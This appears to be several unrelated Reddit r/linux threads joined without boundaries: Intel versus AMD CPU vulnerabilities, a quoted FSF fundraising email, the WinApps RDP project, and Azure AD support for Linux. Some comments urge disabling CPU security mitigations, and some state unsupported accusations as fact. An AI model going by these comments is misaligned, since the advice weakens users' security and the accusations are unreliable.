ThinkPads are already basically the best Linux laptops, and they have a very good AMD option: [https://www.notebookcheck.net/Lenovo-ThinkPad-T495-Review-business-laptop-with-AMD-processor-long-battery-life-and-good-display.434716.0.html](https://www.notebookcheck.net/Lenovo-ThinkPad-T495-Review-business-laptop-with-AMD-processor-long-battery-life-and-good-display.434716.0.html)

And yes I know they are typically sold with Windows, however they typically run Linux very well.
I'm very happy with my Thinkpad T495s.  Ryzen Pro 3700u, and surprisingly good battery life.
Welp. Super glad I went for the 9700k for my gaming rig as opposed to the 9900k.
Doesn't someone need access to a PC to use Spectre/Meltdown exploits?
You're not necessarily safe if you're on AMD. Spectre and Meltdown affected AMD in the past, and while it was less than with Intel, there could be more that just hasn't been found yet in AMD, too.
How often do you run untrusted code on your laptop?
I’m running Linux mint 19 on a fx6300 and it works perfectly fine :)

I can’t understand why people use intel with all them vuns either
 Everyone is convinced that it couldn't possibly produce a bad product. They also think that no other product could possibly be better than Intel. Except for us AMD users. That's the nature of a monopoly. People follow it just because it's popular so it stays popular no matter what.
I was thinking about getting an i9-9900. If I were to get an AMD chip to avoid these security vulnerabilities, what would be an AMD equivalent or superior?
[removed]
So has there ever been a widespread spectre-based attack in circulation? Afaik people didn’t think of it too much because it’s such a theoretical attack vector and most people don’t get hacked by those types of state level actors with the resources to do it.
I was looking at the sponsors of the Embedded Linux conference where Greg K-H made these comments here:

[https://events19.linuxfoundation.org/events/embedded-linux-conference-europe-2019/program/keynote-live-stream/](https://events19.linuxfoundation.org/events/embedded-linux-conference-europe-2019/program/keynote-live-stream/)

And Intel is the diamond sponsor. (And is AMD missing there?)

Intel has been good to Linux for long so I hope I've not come off too strongly against Intel in this post. After all all the machines I've owed so far have Intel chips. But at the same time the lack of competition with laptops carrying AMD chips that don't seem to be affected that much by the recent vulnerabilities is a bit frustrating and allows Intel to slow-walk making the changes.
I would recommend the HP EliteBook 745 G6 or Lenovo ThinkPad T495/T495s as good current generation AMD enterprise-grade laptops.
Are there any benchmarks available that puts intel CPU's to comparable AMD CPU's and tests them with all required safeties in place?
These are the “intel” agency backdoors
Maybe I should have taken the deal on Threadripper 1920X while it was $200.
And there's no one taking advantage of these "vulnerabilities" so maybe don't panic.
/r/theowasright
Is like walking in the bad sector of the city risking a stab... you could quit doing that, but the risks are very little comparing the benefits, so keep performance up!
Dell has AMD laptops.

"Linux laptops" are tbe same laptops that have Linux preinstalled. Current distros run just fine on AMD graphics.
ah back to 2009 performance it is for intel
As an update here are two articles released today that report Intel not being open regd. the fixes to these vulnerabilities. Clearly the fixes are not a priority to Intel.

[https://www.theverge.com/2019/11/13/20962667/intel-processor-security-vulnerabilities-researchers-disclosure](https://www.theverge.com/2019/11/13/20962667/intel-processor-security-vulnerabilities-researchers-disclosure)

[https://www.nytimes.com/2019/11/12/technology/intel-chip-fix.html](https://www.nytimes.com/2019/11/12/technology/intel-chip-fix.html)
My solution to this is simple.  Disable Hyperthreading.  Just add this to your kernel parameters and you'll be good to go after a reboot:

mds=full,nosmt

Did it on my Galago Pro this morning and it worked like a charm:

https://linuxreviews.org/Revisiting_Intel_CPU_bug_workarounds_with_Linux_Kernel_5.2
Give it a couple years and you will be seeing a lot more AMD, IMHO.  They know they are sitting on a cash cow. It takes time to increase production and make new deals with laptop manufacturers.
[ T E A M _ R E D _ I N T E N S I F I E S ]
I try not to run code I don't trust on my laptop. While it would be nice to have protection against cross-process leakage, I don't depend on that as my only line of defense.
> All Linux laptop vendors I know of like Dell, System 76, Purism don't seem to provide AMD based Linux laptops.

Spectre is not an Intel only thing as Meltdown was. You may
fly under the radar of exploits for a while, but in principle
AMD isn’t going to to save you, nor is ARM.
[deleted]
Who gives a fuck any program I run on my computer already has access to everything on my user directory. So every file photo video document I have. It's a single user laptop, not some big server where you have stuff on other users you want to protect.

I've said it before and I'll say if again, the only reason why Linux is relatively safe for single users is the fact that most programs are source audited and the closed source ones are far and few.
Are you aware that Spectre affects ALL widely used CPUs? Intel, AMD, ARM (and all of it's variants including Apple, Qualcomm etc.).

Only Meltdown is specific to Intel. Also, the hyperthreading/SMT bug was discovered several months ago, it's hardly new.

Why do people like me still use and prefer Intel over AMD? Because their Linux support is way better than that of AMDs.

Intel provides a fully open source GPU driver, with pretty much every feature supported. This driver is feature complete and stable a few months ahead of hardware launch (usually). It also just works, with little to no problems.

While with AMD's GPU driver, it's often very buggy, it takes atleast a year for it to be usable, and the driver often breaks some hardware on every kernel update (sometimes even in point releases).

I prefer Intel because their shit just works, while AMD is a buggy broken mess on Linux and I'm tired of their shit.

Also, fuck all of you idiot AMD fanboys who will reply with claims of Intel shilling.

Edit: Once Intel launches their dGPU, I'll consider using Ryzen since I'll have nice trouble free GPU drivers that just work, although it will depend heavily on whether or screwups like RDRAND still occur.
Wait until AMD gets a significant market share and I pretty much bet that you will see suddenly a lot of AMD related vulnerabilities pop up.
Dude guy, of all the Intel vulnerabilities, only Meltdown had the potential to cause problems because with a timed attack you could exploit it via JavaScript of all things.

Everything else, required you to run really untrusted code that you would never have a hope in hell of figuring out. Meltdown has been patched in newer hardware and using BIOS/Microcode updates.

What's more if you are running a server that you know will only run select code, such as AD, File Server, SQL Server, etc. and will never have anyone but a trusted administrator logged in then you can safely disable the mitigations for performance.

But even still, if you are bright enough to watch what you run, you can run a desktop with the mitigations turned off. On my X58 based desktop, I have the Meltdown mitigation turned on and that's it, everything else is turned off, and I've even ran the machine without the Meltdown mitigation turned on.

For my home lab, I know exactly what will run on it and it is never shared with anyone else, so the mitigations are turned off there too.
I'd love to buy an AMD Linux laptop since their ryzen 3000 has been beat the shit out of intel in both performance & price.
[removed]
Vulnerabilities fancy word for backdoor.
This just in from the man himself : 

    Content-Type: text/plain; charset=utf-8
    Content-Transfer-Encoding: 8bit
    Reply-To: "Richard Stallman"
    From: "Richard Stallman"
    Subject: Richard Stallman on why the Free Software Foundation needs your support
    To: me [edit]
    Date: Thu, 29 Dec 2016 13:16:17 -0500
    X-detected-operating-system: by eggs.gnu.org: GNU/Linux 2.2.x-3.x [generic]

    *Read online: <https://www.fsf.org/blogs/rms/a-message-from-rms-support-the-free-software-foundation>*

    Dear Open Source and free software person that you are : [edit]
    
    *With  just  a few days left in 2016, here are some thoughts from
    Richard M. Stallman, President of the  Free  Software  Foundation
    (FSF), on why people support the FSF and what we might be able to
    do next. Your generosity has allowed the FSF to  push  the  fron‐
    tiers  of  free  software.  Please consider making an end of year
    [donation][0] to help us meet our fund‐raising goal  of  $450,000
    by December 31st.*
    
    [0]: https://www.fsf.org/donate?pk_campaign=rms‐appeal&pk_kwd=donate
    
    ![http://static.fsf.org/nosvn/rms‐photos/20161122‐pam‐plona/20161122‐pamplona‐11.jpg] 
        (Richard M. Stallman at the Euro‐pean Dialogues in Spain, November 2016)
    
    I announced the plan to develop the GNU operating system in 1983.
    GNU  was  to be a Unix‐compatible operating system for timeshared
    computers and for workstation computers. Not PCs, though, because
    the  PCs  of  1983 were not powerful enough to run such a system.
    Neither were laptops, of course.
    
    In 1992, when the kernel Linux was freed and filled the last  gap
    in  GNU, PCs had become more powerful. It was possible to run GNU
    on desktop PCs using Linux as the kernel. GNU/Linux in  1992  was
    "complete"  in  the sense that nothing essential was missing, but
    it was rudimentary in that many  much‐used  proprietary  applica‐
    tions had no free counterparts.
    
    Nowadays  many of those applications have been replaced, but some
    are missing. Meanwhile, new theaters of computing  have  come  to
    exist, and the work of liberating them remains ahead of us.
    
    All commercial mobile phones require proprietary software (in the
    modem processor that talks to the phone radio network) that has a
    universal  back  door: it can be changed remotely through the ra‐
    dio.  It should be a felony to make such a product, but it isn’t.
    
    With funds, the FSF could launch a campaign to make that practice
    a  felony.  With funds, the FSF could develop a mobile phone that
    encapsulates the modem processor so as to make the  phone,  in  a
    limited sense, safe to use.
    
    On the other end of computing, many Web sites’ pages contain non‐
    free software (sent in the form of JavaScript  code)  which  they
    install  and  run  in the user’s browser. In many cases that code
    spies on the user.
    
    With funds, the FSF could develop free software front ends to en‐
    able  Internet  users  to  talk to various important Web services
    without running any nonfree software to do it.
    
    Meanwhile, freedom is threatened even at the level of the proces‐
    sors  in  PCs.  The current generation of Intel and AMD processor
    chips are designed with vicious back doors that users cannot shut
    off. (In Intel processors, it’s the "management engine".)
    
    No users should trust those processors.
    
    With funds, the FSF could campaign to pressure those companies to
    give us a way to shut those back doors off.
    
    We also need to enforce the GNU General Public License (GNU  GPL)
    against  companies  that regard its requirement to respect users’
    freedom as a nuisance. This too requires funds.
    
    Why do people support the FSF? Because they appreciate the impor‐
    tance  of  the freedom that we defend, for them and for everyone.
    However, since 1998 we have had to make  an  explicit  effort  to
    spread  awareness of this issue. In that year, a corporate‐funded
    campaign to disconnect free software from our ideas began to  re‐
    brand  free software as "open source" so as to disconnect it from
    our ideas of right and wrong. People  who  don’t  understand  how
    proprietary  software  denies them freedom may not see what there
    is to fight for.
    
    The FSF campaigns team spreads awareness  of  computing  freedom.
    With  more  funds,  we  could hire additional staff to do more of
    this.
    
    Please continue to support the FSF with a donation today.
    
    *[Donate][0] and [share this appeal][1] with your friends.*
    
    [1]: https://www.fsf.org/blogs/rms/a-message-from-rms-support-the-free-software-foundation
    
    Happy Hacking,  
    Richard M. Stallman  
    President  
    Free Software Foundation  
    
    *Credit: Photo: CC BY-SA 3.0, courtesy of the European Dialogues.*
    -- 
    * Follow us at <https://status.fsf.org/fsf>. 
    * Subscribe to our RSS feeds at <https://fsf.org/blogs/RSS>.
    * Join us as an associate member at <https://www.fsf.org/jf>.
    
    Sent from the Free Software Foundation,
    
    51 Franklin St, Fifth Floor
    Boston, Massachusetts 02110-1335
    UNITED STATES
    

Goddamn if there was an alternative to these processors I'd be a happy man.
[deleted]
[deleted]
[deleted]
I have a question, what would RMS do if he were served an NSL?
It's a terribly editorialized , sensationalized and provocatively titled.  Starting it with 'THIS JUST IN : Richard Stallman needs money' like it's just some greedy pitch from an obscure techie cult.  *Shame.*
     Dear Open Source and free software person that you are...
I call BS on the authenticity of this letter, Dr. Stallman NEVER uses the term Open Source, unless expounding upon how inadequate it is, and how, on the contrary, Free Software (not just the open source dev model, but protection of user rights) is as essential and necessary to life as water and sunlight. It's particularly telling that Open Source is capitalised in the letter, while Free Software is not.

Not only did RMS not write it, but he would never let it go out with his name on it in its current, erroneous condition. Whether or not the remainder of claims in the body of the letter are true or false, I confess, I do not know, but I certainly wouldn't regard them as implausible. 

And I do feel that the FSF does important work which is worthy of financial support.
[deleted]
Way more attention needs to be brought to public about these backdoors.  We need major corporations to be on board to do something about it, I'm sure they don't like the idea of it either. 

A pipe dream would be an open source computing platform, right down to the silicon level.  Seems we can't trust anyone anymore. 
What Stallman is asking is a bit limiting.  Making CPUs with back doors a felony implies changing only American law (as far as I know, felonies are unique to US law - certainly they don't exist in Commonwealth countries per se, which differentiate between levels of serious convictions in a different way).  I'm not sure that a non-American proponent of free software is necessarily serving the good of his opinion by helping make things better in only one country.
I LOVE RMS!

Thanks for fighting for our freedom!
I don't have much but I'm definitely donating. 
I just love this guy. I once wrote him an email and he answered!

He and Carl Sagan are semi gods to me. 

Yes I know, I'm crazy, but well, I'm happy too. 
They should just ask the Linux Foundation. /s
This is why I pulled my Amiga 1200 out.   Need to keep safe.
Damn, with that title i thought 2016 did its thing again...
> All commercial mobile phones require proprietary software (in the modem processor that talks to the phone radio network) that has a universal  back  door: it can be changed remotely through the radio.  It should be a felony to make such a product, but it isn’t.
>
> With funds, the FSF could launch a campaign to make that practice a  felony.

A mere $450,000 is not going to make a dent in enough politicians' wallets to care about NSA hacking. Not a chance.
I give $100 every year (when they remind me)     

So…

```
X-detected-operating-system: by eggs.gnu.org: GNU/Linux 2.2.x-3.x [generic]
```

Linux 2.2 was released in January 1999.
Why all the anti-RMS, anti-FSF trolls in this thread?

Given the terrifying push towards greater, ever worse, and ultimately unjustified surveillance of the innocent, RMS and the FSF are perfectly right to push for that which benefits the public and is to the detriment of government and corporate arseholes who want privacy themselves while seeking to steal it away from everyone else!
> All commercial mobile phones require proprietary software (in the modem processor that talks to the phone radio network) that has a universal  back  door: it can be changed remotely through the radio.  It should be a felony to make such a product, but it isn’t.

This is just ridiculous.  I understand the urge to make things we don't like illegal, and might even hesitantly support a minor fine on the business for making negligently insecure software, but the idea that engineers should go to jail -- for multiple years -- for creating a backdoor in software is absolutely absurd.  I can't take it seriously.  And because of that, I have a hard time taking him seriously, and by extension the copyleft community.  That sort of rhetoric is dangerous and unprofessional, and has no place in the formal communications of someone with as much influence as Richard Stallman.
They want money to lobby congress to pass a law.

I would prefer to give money to hire engineers to design chips.

Imagine if instead of writing gcc, Stallman raised money to hire lawyers to ban proprietary compilers.

We wouldn't have any of the tools we have now, but lawyers would make a lot of money.
Well, they make emacs, they get some money from me just for that.
I'm a bot, *bleep*, *bloop*. Someone has linked to this thread from another place on reddit:

- [/r/stallmanwasright] [THIS JUST IN : Richard Stallman needs money. The Free Software Foundation needs money. A quick $120,000 needed. Also "No users should trust those processors" from AMD or Intel with hardware backdoors. : linux](https://np.reddit.com/r/StallmanWasRight/comments/5l158w/this_just_in_richard_stallman_needs_money_the/)

[](#footer)*^(If you follow any of the above links, please respect the rules of reddit and don't vote in the other threads.) ^\([Info](/r/TotesMessenger) ^/ ^[Contact](/message/compose?to=/r/TotesMessenger))*

[](#bot)
They should make sure the money is not earned by proprietary means before accepting them.
Not much, but sent $10 in BTC.
He'd potentially be able to make that sort of money... If he weren't morally opposed to Kickstarter and similar sites
So what good things did they do with last years' funds? I'd expect to see the results of previous funding drives before considering contributing to this one.
So, do I just stop using computers now?
I'm liking all this stuff. Were I not a jobless college student, I'd donate.
How is the JavaScript code non-free? Is it simply because of the license?
/r/titlegore
[deleted]
Hey, /u/lank3y, you should at least link the post to the donate page or include a link to the donate page at the top of the post.
> FSF could develop a mobile phone that
encapsulates the modem processor so as to make the  phone,  in  a
limited sense, safe to use.

That's what [Neo900](http://neo900.org) are [doing](http://neo900.org/faq#privacy).
   >All commercial mobile phones require proprietary 
   software (in the modem processor that talks to the 
   phone radio network) that has a universal  back door: 
   it can be changed remotely through the radio.  It 
   should be a felony to make such a product, but it isn’t.

Really?  A felony?

This is why you lose.  Even if you were *right* in that no one should be allowed to release a chipset with updatable firmware, which you aren't, you'd have to compromise your views to be able to convince anyone who doesn't already agree with you.
This guy thinks he is the most important man alive. How bizarre.

> With funds, the FSF could launch a campaign to make that practice a  felony.

Welp, FSF will never get a dime of my money. I'll gladly give my money to the EFF.
Not renewing my membership this year.     I'd prefer if they stuck to free software instead of getting sidetracked by every single tech issue that encroaches on user rights. E.g. drm, hardware etc. I just don't see the money being used efficiently.
And yet when it comes to one of the few projects actively working on Libre firmware, this happens: [Libreboot](https://libreboot.org/gnu/)
I just set up a 5 dollar recurring donation that is taken out of payroll.  I messaged the FSF to inquire as to if this actually counts as an associate membership but I will at least feel a little better about working in a shop that profits from sales and support of proprietary software.
[deleted]
I just donated $25 from France !
I really don't get all the hype about the Intel ME that's been doing the rounds lately - and now RMS is on it too! I've read about some pretty impressive efforts to disable or seriously break the ME.  Has anybody actually taken the time to read up on what it does?! Not a lot more than has been present on server platforms for years..

Seriously if you are uncomfortable with the ME then go and configure it with an ip/netmask to ensure it cannot communicate on your local LAN segment; if you're especially paranoid then don't use the on board NIC - the ME has no other means to communicate over the network.

I appreciate the case may be different where you don't trust your hardware or your OS, but at least in this case there are mitigations for the hardware and running a OS you trust you can ensure the ME can't do a thing..
I will not donate to FSF.
Should i believe this, i mean, are those Richards Words??
I feel as though most of the money donated to the FSF is wasted.  A large portion is used to buy plane tickets, hotel rooms, and food for Richard Stallman and the people he travels with.
I'm sorry, but no law will prevent such a situation. What we need is verifiable, open-source hardware. 
I'll join the FSF today then. 
Are there any backdoors in the 486 dx2, or pentium pro? I have those laying around if i want privacy ;)
Make Hurd Great Again
> With funds, the FSF could develop a mobile phone that
> encapsulates the modem processor so as to make the  phone,  in  a
> limited sense, safe to use.

Isn't that reality?  For example, in some Qualcomm chip they run a Linux OS, but it's separated from the main processor. And the Android Linux talks to the modem chip Linux via serial ports.

Source [Dissecting modern (3G/4G) cellular modems](https://fahrplan.events.ccc.de/congress/2016/Fahrplan/events/8151.html) from the 33C3.

>  which  they install  and  run  in the user’s browser

There is no "installation" step.
Its a shame. So many people care about these issues, but so few actually contribute to the FSF. 
I will always donate when the FSF/Stallman need money.
This is getting to the point to where you cannot trust anyone at all and we are being told to not trust anyone by people that makes me wonder if I should trust them.
But I don't like or agree with Richard Stallman. More of a BSD guy than a GPL guy. Someone sell me on this. 
I feel like the FSF has taken a few very wrong turns.

Making software and hardware free is not done by campaigning, complaining and fundraising.

If you want free software everywhere, then make it good. Create the best software that can even compete with the big companies.

It's possible. The Linux kernel is so popular not because someone campaigned for it. It's so popular because it's so good.
Apache ousted IIS a long time ago, KVM and Xen dominate the virtualization market.

It's possible. RMS should stop whining and start coding.
What kind of government okays this type of intrusion into your life. This is nefarious as fuck yet nobody cares. Your government HATES you with a holy hatred. They steal 50% of your paycheck and nickel and dime you with law enforcement who feel like they have authority over you or the right to harm you in the name of the law. Law that is so totally obtuse and obfuscated that it requires a lawyer to interpret. There is a much darker and deeper thing going on here and nobody seems to notice or care. They will just mock laugh or call someone insane for pointing out the self evident truth. 
Good.  This is a guy who defended sex with children, necrophilia, and incest.  

Being smart does not excuse being evil. 
The title pretty much says it all, plus Nautilus right-click integration for mime-types.

I got tired of waiting for Hayden Barnes from Ubuntu to update us on his tweet about Word in Ubuntu ([https://twitter.com/unixterminal/status/1255919797692440578?lang=en](https://twitter.com/unixterminal/status/1255919797692440578?lang=en)) which likely uses a similar method *\[UPDATE: Similar, yes, but using spice and as one app at a time. And apparently this was released but I missed it\]*. However WinApps works with just about any application and makes it easy to add your own and submit back to the community.

https://i.redd.it/xpn8n9p30wx51.gif

[https://github.com/Fmstrat/winapps](https://github.com/Fmstrat/winapps)
Hey, you made Windows Subsystem for Linux !
how does it compare to wine? I remember installing and briefly using MS office with wine but everything was kind of buggy so I abandoned it.
Please, use XDG Directory Specification.
You said Barnes' "application" wasn't released, [but it was](https://twitter.com/unixterminal/status/1268975094237446147).

You also said Barnes' likely used a similar method to yours, but he wrote [he didn't use RDP](https://twitter.com/unixterminal/status/1256064397694447616), he answered that [this explanation](https://twitter.com/ibuildthecloud/status/12578769472725196803) was "the closest so far" and [that one](https://twitter.com/win8linux/status/1256575363800395776) seems to be on point.
This feels kinda like the "seemless mode" in Microsoft's old VirtualPC: there's virtualization software running but it stays in the background and the user sees just the app and can access their local (host machine's) files
Can it run Internet Explorer 11? My company has a tool that only runs in explorer and it's the only reason I keep Windows.
This is basically like Parallels for mac, right?
Can I run CygWin?
How abt OneNote and PowerPoint? Also if I’m using PowerPoint with a Wacom tablet, will it recognize the stylus?
Is this GNOME-specific? I gave a cursory glance at the code and it seems to be be desktop agnostic.
Do it with windows 10 Enterprise LTSC. It's the less bloated version there is.
This is sick man. Props to you
Really cool, I'll give it a try soon. I tried using winmin for this before but I didn't have any success, hope this will work
I was curious how File interchange is done, so thanks for documenting

> Files in your home directory are accessible via the \\tsclient\home mount inside the VM

Not to diminish or demotivate: a downside is, you'll need a complete and licensed Windows install in the VM, Wine is considerable more lightweight. But most Laptops used for work have a valid key in the bios. Are you considering methods to minimize OS install size?
I just want photoshop and after effects and i can be in linux full time
[deleted]
Am I the only one that can't see anything? It's stuck in loading... https://i.imgur.com/W2F1kSE.png
### Finally i can delete that windows partition (which i only used for ms office work!)
[deleted]
Lol I genuinely do understand this thread. What are you guys seeing? I'm just seeing a red text "loading..." in the op.

https://imgur.com/a/SX36dVq

Or is everyone just playing along to the joke?
Could someone sticky this post or mention it in the sidebar?? This is the type of content I look for on the sub. Content that helps users to migrate and fully function on Linux 


/u/Fmstrat are you Gandalf reincarnated??
Can someone explain to me how this is possible and why it has not been accomplished before.
Is it that different from virtualbox seamless mode?
This looks really really cool. What's the performance like? Is it any better than just running a vm?
I need to figure out how to run IE 9 on Linux.
Hey, awesome stutff. Wondering does this only work in GNOME or would it work with KDE as well?
1. Very cool
2. Can this handle USB connections  natively, and/or is USB passthru possible? Read through the comments but don't see  anything on the topic.
[deleted]
The post doesn't load for me... just says 'loading...' in red.
is there a noob step by step manual on this? i have a windows qemu vm with remote on i follow the instructions and im always getting a virsh domain error.

From manjaro gnome (arch).
Wait, what is it?
Unrelated, but does anyone know if it's possible to have seamless windows for Linux VMs? Like if one wanted to sandbox their web browser, and just run that in KVM instead of on the host? Maybe using Spice instead of RDP? 

I know Qubes does this, just wondering if it's possible on a regular Gnome distro.
That looks pretty nice.

As it is just a VM in the background, does it means we have no hardware acceleration unless we use a GPU passthrough?
Has it been tried in another distro (say Debian) with other GTK based DE's such as MATE?
Crazy cool stuff, forgot about Hayden blueballing us already.
Really don't understand why he did it besides to gather more attention around it I guess.

It's getting closer to QubesOS setups though lol!

Will check out both projects, saw earlier somebody mentioning multiple apps per VM aren't possible, does yours allow for it?
can it run Photoshop ?
what happens if the app opens another window, like Outlook on writing a new mail?

does it handle notifications? 

these being asked, you are a wonderful talented human being, sharing your work with us!
So basically just X tunneling but to a Windows system instead of an X server.
Will not be surprised if Canonical Ltd include microsoft office on snaps soon! but good for the people that need it, i love closed source on linux like google chrome and spotify but i never use powerpoint and word that mutch so im ok with libreoffice👍🏻
If this works, I never use Windows (except from running in the background for this) again. Thanks!
I just tested this with Fusion 360 and a passthrough GPU.. works surprisingly well in fullscreen! Next stop - Notion!
If this works with creative cloud I'll bust a nut
What about apps from Windows Store? Do they work?
Just wondering, are you planning any further work on this or is development halted?
Would love to see Outlook, it's a good email client for work emails.
meh, its running on a VM or on a remote server.
why?
This is actually amazing! It’s crazy how much Linux has advanced in recent years. Or maybe I’m just getting old.

Either way great work friend!
Does it only work on Ubuntu GNOME? If so, any plans to port it to KDE and/or other distros?
This seems a lot like Parallels for the Mac. This is something I’ve wanted for years. Thank you!
Great idea. How stable is it? Any limitations?
Would it run relatively heavy stuff like power bi/tableau or itunes?
Do i need to use the sample XML? because when i'm trying to use the command `virsh define kvm/RDPWindows.xml` it give me an error 

`error: Failed to define domain from kvm/RDPWindows.xml`   
`error: An error occurred, but the cause is unknown`  


Or can i just create a normal VM with defaults XML? I'm using Manjaro
Nice work, so it's a Windows 10 VM running in the background with xfreerdp (Rail) for RDP RemoteApp functionality. 

The integration would be handy instead of doing it manually, but I doubt you could just double click any old DOCX and have it open in word - would probably need to be in a folder that's shared through the Spice WebDAV channel for that to work (doable).

There is still a lot to be desired with the xfreerdp rail plugin with graphical bugs, but this sorta stuff will hopefully bring in some more people with the right skills to fix it up.
Is it possible to play hd videos from Amazon prime through the ie11? Is if possible to install Edge?
Can this also be setup with reactos so we don't need so much resources for a full blown windows?
Yay for the old RDP trick.
Is it possible to run more than one application at a time? I saw that the VM is logging in at the beginning so i'm wondering if for every application exists a separate user.
How would this work for games?
This looks interesting. I wonder if this can help me achieve my workflow.

I want to use Word on my VM to convert a docx to pdf programatically. (Libreoffice doesn't cut it in this case.) Now, I can use a Com objectin PowerShell, but it only works in an interactive session. In particular, it doesn't work over SSH.

You think this would be possible with this?

Edit: Since this appears to be relatively thin wrapper around xfreerdp, I'll try to work something out directly. Neat idea though.
I'm trying to install... But I'm lost. I don't know what I should do "to define a VM called RDPWindwos from the sample XML file"
Awesome but the config file should be  in \~/.config/winapps instead of \~/.winapps

[https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.html](https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.html)

Edit: Its already an issue in Github
Would you be able to run RSAT with this? Would be super nice to be able to integrate it with Gnome instead of having to launch or remote into a separate VM.
Can it run Solidworks? If it can, I will happily clean my windows partition and install linux
This got me thinking, can you send from a Windows host  a Windows app inside a vm running Linux?
Great project! KDE integration would be neat too
Are applications run on the Windows RDP background VM? If no, does the Windows RDP VM turn off when you close the application? 

Does it allow running multiple applications at a time? Do each application run on its own separate container?
Sorry to post this in your thread but issue #5 says this:

>Running system processes as user is bad practice and is not recommended. Please remove this section and instead run the VM as user domain.


Can someone tell me where I can learn more about it?
Obviously there is a great response to your idea. I would suggest opening a new subreddit and crossposting here.
u/Fmstrat

Sorry for the noob question, idk if here is the place to post this. I did everything in the README, including importing the kvm/RDPApps.reg into the Windows registry using regedit. I hope that is what you mean by "merging".

Anyways, I am stuck with the script trying to find any installed apps. It shouldn't take that long right?

`Installing...Checking for installed apps in RDP machine...`

I suspect I haven't fully enabled RDP in my Windows or maybe there is something wrong in the connection? When setting the "user" in the config file, does it have to include the domain?

If it helps, virsh shows the server running

`$virsh list`  `Id    Name                           State----------------------------------------------------8     RDPWindows                     running`

Thanks in advance.

===============================

Update I echoed some lines from the install script to debug and it looks like its the freerdp

`[19:14:25:979] [13640:13642] [INFO][com.freerdp.core] - freerdp_connect:freerdp_set_last_error_ex resetting error state`   
`[19:14:25:979] [13640:13642] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpdr`   
`[19:14:25:979] [13640:13642] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rdpsnd`   
`[19:14:25:979] [13640:13642] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr`   
`[19:14:25:979] [13640:13642] [INFO][com.freerdp.client.common.cmdline] - loading channelEx rail`   
`[19:14:25:305] [13640:13642] [INFO][com.freerdp.primitives] - primitives autodetect, using optimized`   
`[19:14:25:307] [13640:13642] [INFO][com.freerdp.core] - freerdp_tcp_is_hostname_resolvable:freerdp_set_last_error_ex resetting error state`   
`[19:14:25:307] [13640:13642] [INFO][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex resetting error state`   
`[19:14:40:318] [13640:13642] [ERROR][com.freerdp.core] - freerdp_tcp_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_FAILED [0x00020006]`   
`[19:14:40:318] [13640:13642] [ERROR][com.freerdp.core] - failed to connect to <IP>`
[removed]
They even launch just as slow as in windows /s
How does this affect the battery life of a laptop?
I've tried to install and cant do it works. :/
Is the resource consumption same as running Windows 10 on virtual machine?
has anyone installed in on arch linux ?
How's performance? It takes up too much memory and cpu usage from background bloatware of the windows installation? Or it's just a tad bit higher than the resources consumed by the WinApp?
Does this app give the option to run apps from the windows store other than the .exe that you download and install? For instance, say I want to use groovemusic (not my choice, but hypothetically), would it work?
Just wanted to say that this is amazing!! I have MS Office working and yesterday I manually added SSMS, and it was effortless.

https://streamable.com/9tyoi0
Hi there!

I follow the instruction in your github link. I got stuck, however, in trying to share a folder in Linux host (KDE Neon) to Windows guest to access the MS Office installer downloaded in my host. This is quite an important step but not to be instructed clearly. 

For specific, I'm not sure how to do as following:

>Files in your home directory are accessible via the \\\\tsclient\\home  
 mount inside the VM

How to mount some folders inside the VM?

Could you help me, please?

Thank you very much!
I can copy-paste images and text, right? And is it bidirectional?
it's amazing to have this, but with dual monitor kind of buggy (white borders, black screen, spawning both screens, windows getting smaller when moving) and having to start the VM and wait for it + no gpu so sometimes works but other times it's easier to just reboot.
Can I copy-paste images to and from these programs and linux host?
Csn you play roblox on this?
Gross.
Ew
[deleted]
No thanks.
Could this possible work for Adobe Premiere Pro in the future?
How does Vulkan can work with this?
Citrix XenApp
WHOA! This... Thing is gonna make Wine obsolete!
[deleted]
Hi, I like your idea but failed to make it work (error: execvp: Permission denied).

I have reported my problem on [\#180](https://github.com/Fmstrat/winapps/issues/180); it looks similar to [\#160](https://github.com/Fmstrat/winapps/issues/160) that have something to do with zsh but there is no solution given.

I tried both on KVM and Virtual Box.

Could you please help me to solve it?
How does this perform with games?
This is amazing!

Is there a way for me to use an installed windows (dual booting) as the VM?
[deleted]
Hello my friends, often there are discussions, if/whether Microsoft loves Linux. I want to give you an prominent concrete example, which shows that all the buzz from Microsoft is only marketing, where it benefits them.
They are not neutral or even friendly to Linux. The example i want to give here is the following:

Linux Desktops (Computers/Laptops) outside of AzureAD are not able to use a Microsoft Azure ActiveDirectory (Short AAD) for Authentication. And Microsoft wants Companies to remove their OnPremiseAD and move totally into the Cloud with a managed ActiveDirectory (AD) and Companies really consider it (ha..). With Windows of course this works, with Apple Microsoft says there are additional Partners which provide this. When you ask Microsoft or Azure Representatives: a big glaring NOTHING. Multiple Microsoft people were asked, if there would be at least  defacto authentication possibility.. no response or sth like "it's not supported".

The funny Thing is:

* Linux Desktops can authenticate against LDAP and Kerberos (which are a large Block of ActiveDirectory)
* Linux Desktops can authenticate with OpenID/OAuth2 against an OpenID/Oauth Provider like Keycloak (and AAD also supports that)
* Linux Desktops can authenticate against an OnPremise Active ActiveDirectory within a Company environment
* Linux VMs WITHIN Azure can use the AAD for Authentication. (there are several github repositories for that)

Therefore, it really cannot be that hard, to replicate this feature technically for generic linux clients, even if it does not support the full featureset (like conditional access for example)

But the service that Desktop Computers or Laptops with an Linux OS can authenticate against an Microsoft AAD service does not exist, is not supported and carefully avoided in the documentation. And Microsoft employees hush about it.

Why would you want that Linux uses an Cloud-ActiveDirectory for Authentication? 

* it give you the possibility of choice on your desktop platforms
* it is easy to buy and easy to operate from, as you do not have to run onprem servers (everything in the cloud)
* from my POV you could even relatively easy migrate away from it, but you have to know what you do, and design your desktops for it.

I admit, not everybody wants that, and that's totally okay -  but i am lowkey furious that it is not possible for a desktop linux to authenticate against these systems. From my point of view this is discrimination. 

This is my yearly insight, that, again, microsoft only loves money and market control. do not trust them. they are cornering the market again. We are after Extend and short before Extinguish from my POV.

What's your opinion on that topic?
There are two different Azure identity providers. There's Azure AD (Active Directory) and then there's Azure AD DS (Active Directory Domain Services).

